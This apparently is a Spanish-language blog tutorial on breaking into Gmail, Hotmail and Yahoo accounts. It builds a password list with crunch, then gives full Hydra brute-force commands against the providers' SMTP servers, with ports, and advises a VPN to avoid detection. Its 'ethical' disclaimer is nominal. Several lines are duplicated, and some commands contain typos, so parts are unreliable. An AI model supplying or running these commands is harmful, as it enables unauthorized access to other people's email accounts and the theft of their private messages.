Últimamente la gente anda desesperada porque hacer estos tipos de métodos y he decidido en mostrar un pequeño método donde podrás acceder a una cuenta de “GMAIL”.
Y este tutorial se hace con el fin ético, no deseo mas mensajes como esto, gracias.
Y este tutorial se hace con el fin ético, no deseo mas mensajes como esto, gracias.
Primer paso:
Conseguir o hacer un buen diccionario.
se van a la terminal y crean uno con “CRUNCH”
Conseguir o hacer un buen diccionario.
se van a la terminal y crean uno con “CRUNCH”
Te daré un ejemplo:
crunch 5 9 abcdefghijklmnopkrstuvwxyz -o /root/Desktop/pass.lst
Luego seguimos en nuestra terminal.
Segundo Paso:
La herramienta se llama “Hydra”
La herramienta se llama “Hydra”
Este método es un poco antiguo entonces las personas que tengan su cuenta bien configurada y protegida le saltara una alerta.
Les recomiendo que usen VPN
Te dare un Ejemplo:
hydra -S -l email@gmail.com -P /root/Desktop/ArchivoDiccionario -v -V -e ns -s 465 smtp.gmail.com smtp
Desde aquí viene la actualización de este post.
Hoy me he levantado con una resaca pero aqui me tienen actualizando mi post. Vale usaremos la misma herramienta “HYDRA”
Se preguntarán que es HYDRA?
Hydra es una entrada paralelizado que soporta numerosos protocolos para atacar. Es muy rápido y flexible, y los nuevos módulos son fáciles de agregar.Esta herramienta permite a los investigadores y consultores de seguridad para mostrar lo fácil que sería la de obtener acceso no autorizado a un sistemaremoto. Es compatible con: Cisco AAA, Cisco auth, Cisco enable, CVS, FTP, HTTP(S)-FORM-GET, HTTP(S)-FORM-POST, HTTP(S)-GET, HTTP(S)-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MySQL, NNTP, Oracle Listener, Oracle SID, PC-Anywhere, PC-NFS, POP3, PostgreSQL, RDP, Rexec, Rlogin, Rsh, SIP, SMB(NT), SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.
Info about mail accounts
gmail
gmail
server: smtp.gmail.com
port: 465
hotmail
hotmail
server: smtp.live.com
port: 587
yahoo
yahoo
server: smtp.mail.yahoo.com
port:587
Después de terminar de leer la teoría básica sobre HYDRA.
He estado jugando con mis cuentas de GMAIL y aunque sacará la contraseña me lanza alerta de intruso conectado pero ese es otro tema. En este caso haremos una fuerza bruta para solo obtener la contraseña.
Ahora me preguntarán CREAD cual seria ese comando?
Bueno he estado investigando alguna data sobre SMTP porque en otro países cambiar. Te doy un ejemplo “RUSIA”
smt.mail.ru pero fijate que no es de GMAIL.
Ahora lo que investigue esta aqui….. y por aqui
Bueno he estado investigando alguna data sobre SMTP porque en otro países cambiar. Te doy un ejemplo “RUSIA”
smt.mail.ru pero fijate que no es de GMAIL.
Ahora lo que investigue esta aqui….. y por aqui
Se basa de comandos y opciones HYDRA.
hydra -S -l test@gmail.com -P (DICCIONARIO) -v -V -e ns -s 465 smtp.gmail.com smtp
Ahora el comando que uso es
hydra -s 465 -S -v -V -l test@gmail.com -P (DICCIONARIO) -t 1 -w 32 stmp.gmail.com smtp
Te recomiendo que lo escribas en tu terminal.
Para más comandos y opciones son los siguiente.
hydra -x -h
Puedes atacar con carácter especifico que nos ofrece hydra como si tuvieras un diccionario.
“8:10:a1”
hydra -s 465 -s -v -V -l correo -x 8:10:a1 -t 1 -w 32 smtp.gmail.com smtp
Para redes lean en su soporte para que sea compatible.
hydra -l admin -P 'DICIONARIO' http://192.168.1.1 -s PUERTO ejemplo 1080
Para HOTMAIL
hydra -s 587 -s -v -V -l creadpag548@hotmail.com -P '/root/Desktop/cread.txt' -t 1 -w 32 smtp.live.com smtp
PARA YAHOO Lo mismo solo cambias su SMTP y su puerto
Espero haberte ayudado porque es una mega herramienta que solo tienes que jugar y jugar con ella.
Si te gusto ayudame a compartirlo.
Espero haberte ayudado porque es una mega herramienta que solo tienes que jugar y jugar con ella.
Si te gusto ayudame a compartirlo.
No hay comentarios:
Publicar un comentario